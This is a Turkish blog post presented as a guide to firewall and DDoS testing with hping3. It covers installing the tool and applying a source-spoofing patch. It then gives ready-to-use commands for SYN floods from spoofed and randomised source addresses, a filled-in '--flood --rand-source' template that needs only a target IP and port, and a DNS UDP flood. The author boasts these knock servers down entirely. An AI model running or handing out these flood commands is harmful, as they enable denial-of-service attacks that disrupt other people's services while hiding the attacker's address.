Swift with Furkan

Linux üzerine hping3 kurmak, firewall test etmek

ddosprotection

Linux hping3 üzerinden Firewall testleri

DDoS testleri gerçekleştirilirken genellikle test yapılan ağın çıkışındaki bir ağ/güvenlik cihazı üretilen sahte ip paketlerini URPF’den (ya da benzeri bir özellikten) dolayı engelliyor olabilir. Bu gibi durumlarda DDoS testlerinde üretilen paketler internete çıkamayacağı için hedef sisteme etkisi olmayacaktır. Bu gibi ortamlarda gönderilecek paketler kullanılan sistemle aynı subnetten üretilirse (mesela DDoS testi icin kullanılan sistemin ip adresi 192.168.1.3/24 olsun, burada 192.168.1.0/24 subnetinden rastgele ip kullanılabilir) URPF’e takılmadan hedef sisteme erişecektir.
DDoS testlerinde yoğun kullanılan Hping,  network testleri icin kullanilan acik kaynak kodlu bir yazilimdir. Ozellikle –rand-source parametresi ile kaynak ip adreslerinin değişken olması sağlanabilmektedir.

Ancak istenen ip adres blogundan kaynak paketlerin gonderilebilmesi hping ile on tanımlı olarak saglanamamaktadir. BGA ekibinden Omer Albayrak tarafından  geliştirilen yama ile bu ozellik –rand-pattern-source parametresi ile sağlanabilmektedir. Ilgili yamanın uygulanması ve sonrasında kullanımına  dair ayrıntılar aşağıda anlatılmaktadır.

Kuruluma geçelim (Centos)

[php]yum install -y epel-release

yum install -y hping3[/php]

 

komutuyla centos üzerine hping3 kurulumunu gerçekleştirdik. Debian ubuntu ve apt deposuyla çalışanlar için,

[php]apt-get install -y tcl8.4 tcl8.4-dev

apt-get install -y hping3[/php]

 

veya tüm sistemler için

[php]mkdir /usr/local/include/net
ln -sf /usr/include/pcap-bpf.h /usr/local/include/net/bpf.h
wget <a href="http://www.hping.org/hping3-20051105.tar.gz" target="_blank">http://www.hping.org/hping3-<wbr />20051105.tar.gz</a>
tar -zxvf hping3-20051105.tar.gz
cd hping3-20051105/
patch -p1 -i ../hping-rand-pattern.patch
./configure; make; make install[/php]

 

komutuyla tüm linux sürümleri için hping3’ü kurmuş olduk. Örneğin 127.0.0.1 ip adresinin tcp/8080 portuna 5.5.5.x kaynak ip adres blogundan paket gondermek icin (yani 5.5.5.x olarak ip adresimizi gösterip(fake hedef site kandırma amacı) 127.0.0.1’e saldırma);

[php]hping3 -c 3 -S -p 8080 127.0.0.1 –rand-pattern-source 5.5.5.x[/php]

 

Syn saldırılarına geçelim şu komut ile hedef-ip ve hedef-port olarak saldıralım;

[php]hping3 -p hedef-port -S hedef-ip[/php]

 

İp adresimizi gizleyip fake ipten saldırma komutu syn flood için,

[php]hping3 -a fake-kullaniacak-ip -p hedef-port -S hedef-ip[/php]

 

Başlangıcı fake ipten başlatıp sürekli fake ip oluşturarak saldırmak için ise,

[php]hping3 -p hedef-port -S hedef-ip –rand-source[/php]

 

Flood izinli sunucularda ise, saldırının bel kemiği olan flood parametresi ile yerle bir edilmesi kaçınılmazdır 🙂 Sizlere tüm parametreler tam doldurulmuş syn halini göstereyim. hedef-port ve hedef-ip bölmünü doldurmanız yeterli olacaktır.

[php]

hping3 -c 10000 -d 120 -S -w 64 -p hedef-port –flood –rand-source hedef-ip[/php]

Değişken isimlerine gelirsek,

 

Ve sizlere DNS Flood’u da vererek yazıyı bitirmek istiyorum. Bizde sıkılıyoruz hani yazarken 🙂 DNS UDP Floodtur. Buda kodummu otutturur. Sunucu çöker kökten. Sunucu çökmese bile o alan adına erişim olmaz.

[php]hping3 –flood –rand-source –udp -p 53 dns_sunucu_ip_adresi -d 450[/php]

Değişkenleri artık anlamışsınızdır diyerek, Yazıyı bitirmek istiyorum. Başka bir yazıda görüşmek üzere…

Furkan Sandal

Exit mobile version